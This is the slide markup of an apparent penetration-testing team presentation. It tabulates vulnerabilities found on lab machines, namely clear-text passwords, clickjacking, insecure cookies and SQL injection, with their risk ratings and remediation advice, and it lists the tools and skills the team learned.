                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:lnB w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="A61C00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Confidentiality, Integrity and availability loss</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Avoid file inclusion and arbitrary command injection attacks.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Perform input validation of all form fields in HTML, PHP.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Albania</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Chaos</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Curling</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="284" name="Google Shape;284;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4066931013"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="378600" y="72450"/>
          <a:ext cx="8386800" cy="4998600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{158EDE2D-5140-4CE5-8088-8FD6ECF2DEED}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1257150">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1257175">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1357600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1528400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1819725">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1166750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="344300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Parameter</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0"/>
                        <a:t>Risk Rating</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">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
                        <a:t>Risk Impact Type</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Recommendation</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Machine</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1263600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Clear-text password</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Storage</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Database table was stored in clear text and credentials was stored on browser interface</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>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 sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>High</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Confidentiality and Integrity loss</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Database should be restricted and available locally to the db server host or to a limited set of hosts.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Albania</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Chaos</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1230175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>X-Frame-Header-Option not set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Session Cookie without secure flag</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en" sz="1200"/>
                        <a:t>Clickjacking</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Transmission of cookie in clear text over unencrypted http request</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnR w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Medium</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Data Integrity</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Setting secure flag will prevent browser from transmitting cookie over unencrypted channel be set</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Albania</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Curling</a:t>
                      </a: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820681">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" dirty="0"/>
                        <a:t>SQL Injection</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" dirty="0"/>
                        <a:t>Alters backend SQL statement by manipulating user’s input</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnR w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Critical</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                    <a:lnR w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:lnB w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="A61C00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Compromises the integrity of databases and exposes sensitive information</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Use of prepared statements</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" dirty="0"/>
                        <a:t>Albania</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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131025" y="1655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Outcome</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299675" y="984075"/>
            <a:ext cx="8427300" cy="403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Understanding of the different stages of VAPT;  PTES ; OWASP Standards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Linux System Administration</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VPN Tunneling</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Hacktivist Forums and Support Groups; Github</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Understanding of Network Protocols and their possible expliotations</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HTTP</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SSH</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IMAP | IMAPs</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POP3 | POP3s</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TLS/SSL</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NDMP</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Better grasp of the use of various tools in Penetration Testing</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Metasploit</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Masscan</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Nikto</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Gobuster</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Base64</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70CC-C7A0-476A-9ACF-AB4B7FCAFF4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3146821" y="309987"/>
            <a:ext cx="2850356" cy="607800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t>Meet the Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832A2FF4-D467-4DE8-BDEC-F52859816681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2417862"/>
            <a:ext cx="4572000" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0">
              <a:effectLst/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A picture containing text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9243B0E5-8B6A-4AA8-8599-8D9B3C04932A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1143000" y="1107280"/>
            <a:ext cx="6858000" cy="3600449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
